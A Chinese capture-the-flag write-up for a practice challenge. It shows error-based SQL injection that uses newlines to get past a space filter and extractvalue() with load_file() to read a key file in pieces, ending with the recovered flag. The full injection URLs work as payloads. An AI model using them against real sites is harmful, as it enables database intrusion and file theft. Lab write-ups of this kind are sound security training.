CTF练习平台——报错注入

TIM截图20180208125700.png

这道题过滤了单引号、双引号等,最主要是过滤了空格,根据mysql的特性,我们可以用换行符代替空格符

这里我通过extractvalue报错,注入语句如下
http://103.238.227.13:10088/?id=1%0Aand%0aextractvalue(1,concat(0x7e,(select%0a@@version),0x7e))

成功报错

接下来根据题目提示我们要读取文件
http://103.238.227.13:10088/?id=1%0Aand%0a(extractvalue(1,concat(0x7e,(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))),0x7e)))

TIM截图20180208140201.png

extractvalue性质就是只能读32位,经过hex后得到的有用位是16位
事实上这个是函数截断了,读取文件本身没问题,所以接下来用strsub试试
http://103.238.227.13:10088/?id=1%0aand%0a(extractvalue(1,concat(0x7e,substr(hex(load_file(0x2f7661722f746573742f6b65795f312e706870))%0afrom%0a161%0afor%0a20),0x7e)))
TIM截图20180208140835.png

接下来只要修改偏移逐渐恢复文件就行了
最后恢复的文件为:

<?php fdsafasfdsafidsafdsaifdsakfdsaifdsafdsafdsafdsafkdsa;fdsafdsafsdafdsafas0hfdsg9Flag:"7249f5a7fd1de602b30e6f39aea6193a"fsdafsafdsafdsafdsafa ?>

得到flag:

Flag:”7249f5a7fd1de602b30e6f39aea6193a”

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 第2章 基本语法 2.1 概述 基本句法和变量 语句 JavaScript程序的执行单位为行(line),也就是一...
    悟名先生阅读 9,711评论 0 13
  • Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 3,964评论 0 3
  • 1.web基础$_GET writeup: 输入http://120.24.86.145:8002/get/?wh...
    Sec小玖阅读 5,335评论 0 0
  • WEB2 看源代码得flag 文件上传测试 找一张图片上传,截包改后缀名为.php得flag 计算题 F12修改输...
    a2dd56f6ad89阅读 18,603评论 0 2
  • 《有钱人和你想的不一样》 哈维.艾克 第八部分——————————第8期 日期12/5财富档案16有钱人就算恐惧...
    YYmore阅读 2,726评论 1 0

友情链接更多精彩内容